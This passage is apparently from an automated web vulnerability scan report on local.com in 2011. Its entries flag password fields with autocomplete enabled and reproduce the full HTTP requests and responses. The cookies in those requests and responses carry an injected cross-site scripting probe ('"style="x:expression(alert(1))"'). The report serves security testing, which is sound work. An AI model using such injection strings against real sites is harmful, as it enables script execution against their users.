__utma=177062200.66342387.1296748820.1296748820.1296748820.1; SiteLifeHost=SJL01WSITELCL01proddmlocal; localuserid=5abc3b67-eaa3-419d-81c2-41a43cc0eb62; __utmc=177062200; ASP.NET_SessionId=asnxtpi5da2ya3454rhwd045; __utmb=177062200.8.10.1296748820; __qca=P0-30084348-1296748820628;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
ntCoent-Length: 40029
Date: Thu, 03 Feb 2011 16:37:24 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428; domain=www.local.com; expires=Wed, 02-Feb-2011 16:37:23 GMT; path=/
Set-Cookie: localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Cet+Products+%26+Liquidators|Dallas%2c+TX|Appraisal+And+Liquidation+Services|11134700|9985416~Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; domain=local.com; expires=Sat, 05-Mar-2011 15:56:17 GMT; path=/
Content-Length: 40029

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en-us">
<head>
<title>Cet Products & Liquidators in
...[SNIP]...
</p>

               <form id="login-form">
                   <label class="cap">
...[SNIP]...
<br />
                   <input class="txt mB5 inputBody" name="password" id="input-password" type="password" />
                   <input class="fl mR10" name="remember" type="checkbox" value="remember" />
...[SNIP]...

5.11. http://www.local.com/business/details/map/dallas-tx/equity-bank-63975058/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.local.com
Path:   /business/details/map/dallas-tx/equity-bank-63975058/

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /business/details/map/dallas-tx/equity-bank-63975058/ HTTP/1.1
Host: www.local.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BIGipServercommunity.local.pluck.com.sitelife-80=596379914.20480.0000; k_visit=1; localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428; __utmz=177062200.1296748820.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; s_sq=%5B%5BB%5D%5D; campid=506; ym_pop_freq1421534=1; ym_pop_freq_expiration1421534=Fri, 04 Feb 2011 16:01:44 GMT; localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; anonId=101d4217-dda7-4536-8a17-9bdfc4b5b95f; s_cc=true; s_vi=[CS]v1|26A56884851D1175-60000145004A830C[CE]; s_nr=1296748831212; session_start_time=1296748820317; __utma=177062200.66342387.1296748820.1296748820.1296748820.1; SiteLifeHost=SJL01WSITELCL01proddmlocal; localuserid=5abc3b67-eaa3-419d-81c2-41a43cc0eb62; __utmc=177062200; ASP.NET_SessionId=asnxtpi5da2ya3454rhwd045; __utmb=177062200.8.10.1296748820; __qca=P0-30084348-1296748820628;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
ntCoent-Length: 39437
Date: Thu, 03 Feb 2011 16:37:38 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428; domain=www.local.com; expires=Wed, 02-Feb-2011 16:37:36 GMT; path=/
Set-Cookie: localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058~Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000; domain=local.com; expires=Sat, 05-Mar-2011 15:56:17 GMT; path=/
Content-Length: 39437

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en-us">
<head>
<title>Equity Bank in Dallas, TX -
...[SNIP]...
</p>

               <form id="login-form">
                   <label class="cap">
...[SNIP]...
<br />
                   <input class="txt mB5 inputBody" name="password" id="input-password" type="password" />
                   <input class="fl mR10" name="remember" type="checkbox" value="remember" />
...[SNIP]...

5.12. http://www.local.com/business/details/map/dallas-tx/hillcrest-bank-104826937/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.local.com
Path:   /business/details/map/dallas-tx/hillcrest-bank-104826937/

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /business/details/map/dallas-tx/hillcrest-bank-104826937/ HTTP/1.1
Host: www.local.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BIGipServercommunity.local.pluck.com.sitelife-80=596379914.20480.0000; k_visit=1; localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428; __utmz=177062200.1296748820.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; s_sq=%5B%5BB%5D%5D; campid=506; ym_pop_freq1421534=1; ym_pop_freq_expiration1421534=Fri, 04 Feb 2011 16:01:44 GMT; localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; anonId=101d4217-dda7-4536-8a17-9bdfc4b5b95f; s_cc=true; s_vi=[CS]v1|26A56884851D1175-60000145004A830C[CE]; s_nr=1296748831212; session_start_time=1296748820317; __utma=177062200.66342387.1296748820.1296748820.1296748820.1; SiteLifeHost=SJL01WSITELCL01proddmlocal; localuserid=5abc3b67-eaa3-419d-81c2-41a43cc0eb62; __utmc=177062200; ASP.NET_SessionId=asnxtpi5da2ya3454rhwd045; __utmb=177062200.8.10.1296748820; __qca=P0-30084348-1296748820628;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
ntCoent-Length: 39591
Date: Thu, 03 Feb 2011 16:37:39 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428; domain=www.local.com; expires=Wed, 02-Feb-2011 16:37:38 GMT; path=/
Set-Cookie: localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Hillcrest+Bank|Dallas%2c+TX|Retail+Banks|15020100|104826937~Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; domain=local.com; expires=Sat, 05-Mar-2011 15:56:17 GMT; path=/
Content-Length: 39591

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en-us">
<head>
<title>Hillcrest Bank in Dallas, TX
...[SNIP]...
</p>

               <form id="login-form">
                   <label class="cap">
...[SNIP]...
<br />
                   <input class="txt mB5 inputBody" name="password" id="input-password" type="password" />
                   <input class="fl mR10" name="remember" type="checkbox" value="remember" />
...[SNIP]...

5.13. http://www.local.com/business/details/map/dallas-tx/sterling-bank-16856575/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.local.com
Path:   /business/details/map/dallas-tx/sterling-bank-16856575/

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /business/details/map/dallas-tx/sterling-bank-16856575/ HTTP/1.1
Host: www.local.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BIGipServercommunity.local.pluck.com.sitelife-80=596379914.20480.0000; k_visit=1; localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428; __utmz=177062200.1296748820.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; s_sq=%5B%5BB%5D%5D; campid=506; ym_pop_freq1421534=1; ym_pop_freq_expiration1421534=Fri, 04 Feb 2011 16:01:44 GMT; localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; anonId=101d4217-dda7-4536-8a17-9bdfc4b5b95f; s_cc=true; s_vi=[CS]v1|26A56884851D1175-60000145004A830C[CE]; s_nr=1296748831212; session_start_time=1296748820317; __utma=177062200.66342387.1296748820.1296748820.1296748820.1; SiteLifeHost=SJL01WSITELCL01proddmlocal; localuserid=5abc3b67-eaa3-419d-81c2-41a43cc0eb62; __utmc=177062200; ASP.NET_SessionId=asnxtpi5da2ya3454rhwd045; __utmb=177062200.8.10.1296748820; __qca=P0-30084348-1296748820628;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
ntCoent-Length: 39493
Date: Thu, 03 Feb 2011 16:37:51 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428; domain=www.local.com; expires=Wed, 02-Feb-2011 16:37:50 GMT; path=/
Set-Cookie: localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Sterling+Bank|Dallas%2c+TX|Retail+Banks|15020100|16856575~Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; domain=local.com; expires=Sat, 05-Mar-2011 15:56:17 GMT; path=/
Content-Length: 39493

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en-us">
<head>
<title>Sterling Bank in Dallas, TX -
...[SNIP]...
</p>

               <form id="login-form">
                   <label class="cap">
...[SNIP]...
<br />
                   <input class="txt mB5 inputBody" name="password" id="input-password" type="password" />
                   <input class="fl mR10" name="remember" type="checkbox" value="remember" />
...[SNIP]...

5.14. http://www.local.com/business/results/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.local.com
Path:   /business/results/

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /business/results/?keyword=restaurants&location=dallas%2c+tx HTTP/1.1
Host: www.local.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BIGipServercommunity.local.pluck.com.sitelife-80=596379914.20480.0000; k_visit=1; localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428; __utmz=177062200.1296748820.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; s_sq=%5B%5BB%5D%5D; campid=506; ym_pop_freq1421534=1; ym_pop_freq_expiration1421534=Fri, 04 Feb 2011 16:01:44 GMT; localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; anonId=101d4217-dda7-4536-8a17-9bdfc4b5b95f; s_cc=true; s_vi=[CS]v1|26A56884851D1175-60000145004A830C[CE]; s_nr=1296748831212; session_start_time=1296748820317; __utma=177062200.66342387.1296748820.1296748820.1296748820.1; SiteLifeHost=SJL01WSITELCL01proddmlocal; localuserid=5abc3b67-eaa3-419d-81c2-41a43cc0eb62; __utmc=177062200; ASP.NET_SessionId=asnxtpi5da2ya3454rhwd045; __utmb=177062200.8.10.1296748820; __qca=P0-30084348-1296748820628;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Cteonnt-Length: 167707
Date: Thu, 03 Feb 2011 16:43:24 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428; domain=www.local.com; expires=Wed, 02-Feb-2011 16:43:23 GMT; path=/
Set-Cookie: localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=restaurants&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=restaurants|Dallas%2c+TX~banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; domain=local.com; expires=Sat, 05-Mar-2011 15:56:17 GMT; path=/
Content-Length: 167707

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en-us">
<head>
<title>Dallas, TX restaurants | Find
...[SNIP]...
</p>

               <form id="login-form">
                   <label class="cap">
...[SNIP]...
<br />
                   <input class="txt mB5 inputBody" name="password" id="input-password" type="password" />
                   <input class="fl mR10" name="remember" type="checkbox" value="remember" />
...[SNIP]...

5.15. http://www.local.com/business/results/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.local.com
Path:   /business/results/

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /business/results/ HTTP/1.1
Host: www.local.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BIGipServercommunity.local.pluck.com.sitelife-80=596379914.20480.0000; k_visit=1; localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428; __utmz=177062200.1296748820.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; s_sq=%5B%5BB%5D%5D; campid=506; ym_pop_freq1421534=1; ym_pop_freq_expiration1421534=Fri, 04 Feb 2011 16:01:44 GMT; localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; anonId=101d4217-dda7-4536-8a17-9bdfc4b5b95f; s_cc=true; s_vi=[CS]v1|26A56884851D1175-60000145004A830C[CE]; s_nr=1296748831212; session_start_time=1296748820317; __utma=177062200.66342387.1296748820.1296748820.1296748820.1; SiteLifeHost=SJL01WSITELCL01proddmlocal; localuserid=5abc3b67-eaa3-419d-81c2-41a43cc0eb62; __utmc=177062200; ASP.NET_SessionId=asnxtpi5da2ya3454rhwd045; __utmb=177062200.8.10.1296748820; __qca=P0-30084348-1296748820628;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
ntCoent-Length: 132916
Date: Thu, 03 Feb 2011 16:40:01 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428; domain=www.local.com; expires=Wed, 02-Feb-2011 16:39:59 GMT; path=/
Set-Cookie: localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fbusiness%2fresults%2f~Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; domain=local.com; expires=Sat, 05-Mar-2011 15:56:17 GMT; path=/
Content-Length: 132916

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en-us">
<head>
<title>Dallas, TX banks | Find banks
...[SNIP]...
</p>

               <form id="login-form">
                   <label class="cap">
...[SNIP]...
<br />
                   <input class="txt mB5 inputBody" name="password" id="input-password" type="password" />
                   <input class="fl mR10" name="remember" type="checkbox" value="remember" />
...[SNIP]...

5.16. http://www.local.com/contact.aspx  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.local.com
Path:   /contact.aspx

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /contact.aspx HTTP/1.1
Host: www.local.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BIGipServercommunity.local.pluck.com.sitelife-80=596379914.20480.0000; k_visit=1; localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428; __utmz=177062200.1296748820.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; s_sq=%5B%5BB%5D%5D; campid=506; ym_pop_freq1421534=1; ym_pop_freq_expiration1421534=Fri, 04 Feb 2011 16:01:44 GMT; localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; anonId=101d4217-dda7-4536-8a17-9bdfc4b5b95f; s_cc=true; s_vi=[CS]v1|26A56884851D1175-60000145004A830C[CE]; s_nr=1296748831212; session_start_time=1296748820317; __utma=177062200.66342387.1296748820.1296748820.1296748820.1; SiteLifeHost=SJL01WSITELCL01proddmlocal; localuserid=5abc3b67-eaa3-419d-81c2-41a43cc0eb62; __utmc=177062200; ASP.NET_SessionId=asnxtpi5da2ya3454rhwd045; __utmb=177062200.8.10.1296748820; __qca=P0-30084348-1296748820628;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
ntCoent-Length: 27733
Date: Thu, 03 Feb 2011 16:53:38 GMT
Content-Length: 27733
Connection: close
Set-Cookie: localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428; domain=www.local.com; expires=Wed, 02-Feb-2011 16:53:38 GMT; path=/
Set-Cookie: localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; domain=local.com; expires=Sat, 05-Mar-2011 15:56:17 GMT; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en-us">
<head>
<title></title>

<
...[SNIP]...
</p>

               <form id="login-form">
                   <label class="cap">
...[SNIP]...
<br />
                   <input class="txt mB5 inputBody" name="password" id="input-password" type="password" />
                   <input class="fl mR10" name="remember" type="checkbox" value="remember" />
...[SNIP]...

5.17. http://www.local.com/coupons/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.local.com
Path:   /coupons/

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /coupons/ HTTP/1.1
Host: www.local.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BIGipServercommunity.local.pluck.com.sitelife-80=596379914.20480.0000; k_visit=1; localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428; __utmz=177062200.1296748820.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; s_sq=%5B%5BB%5D%5D; campid=506; ym_pop_freq1421534=1; ym_pop_freq_expiration1421534=Fri, 04 Feb 2011 16:01:44 GMT; localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; anonId=101d4217-dda7-4536-8a17-9bdfc4b5b95f; s_cc=true; s_vi=[CS]v1|26A56884851D1175-60000145004A830C[CE]; s_nr=1296748831212; session_start_time=1296748820317; __utma=177062200.66342387.1296748820.1296748820.1296748820.1; SiteLifeHost=SJL01WSITELCL01proddmlocal; localuserid=5abc3b67-eaa3-419d-81c2-41a43cc0eb62; __utmc=177062200; ASP.NET_SessionId=asnxtpi5da2ya3454rhwd045; __utmb=177062200.8.10.1296748820; __qca=P0-30084348-1296748820628;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
ntCoent-Length: 103071
Date: Thu, 03 Feb 2011 16:44:37 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428; domain=www.local.com; expires=Wed, 02-Feb-2011 16:44:36 GMT; path=/
Set-Cookie: localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058&coupons.kw=; domain=local.com; expires=Sat, 05-Mar-2011 15:56:17 GMT; path=/
Content-Length: 103071

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en-us">
<head>
<title>Coupons in Dallas, TX | Local
...[SNIP]...
</p>

               <form id="login-form">
                   <label class="cap">
...[SNIP]...
<br />
                   <input class="txt mB5 inputBody" name="password" id="input-password" type="password" />
                   <input class="fl mR10" name="remember" type="checkbox" value="remember" />
...[SNIP]...

5.18. http://www.local.com/coupons/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.local.com
Path:   /coupons/

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /coupons/?location=Dallas%2c+TX HTTP/1.1
Host: www.local.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BIGipServercommunity.local.pluck.com.sitelife-80=596379914.20480.0000; k_visit=1; localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428; __utmz=177062200.1296748820.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; s_sq=%5B%5BB%5D%5D; campid=506; ym_pop_freq1421534=1; ym_pop_freq_expiration1421534=Fri, 04 Feb 2011 16:01:44 GMT; localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; anonId=101d4217-dda7-4536-8a17-9bdfc4b5b95f; s_cc=true; s_vi=[CS]v1|26A56884851D1175-60000145004A830C[CE]; s_nr=1296748831212; 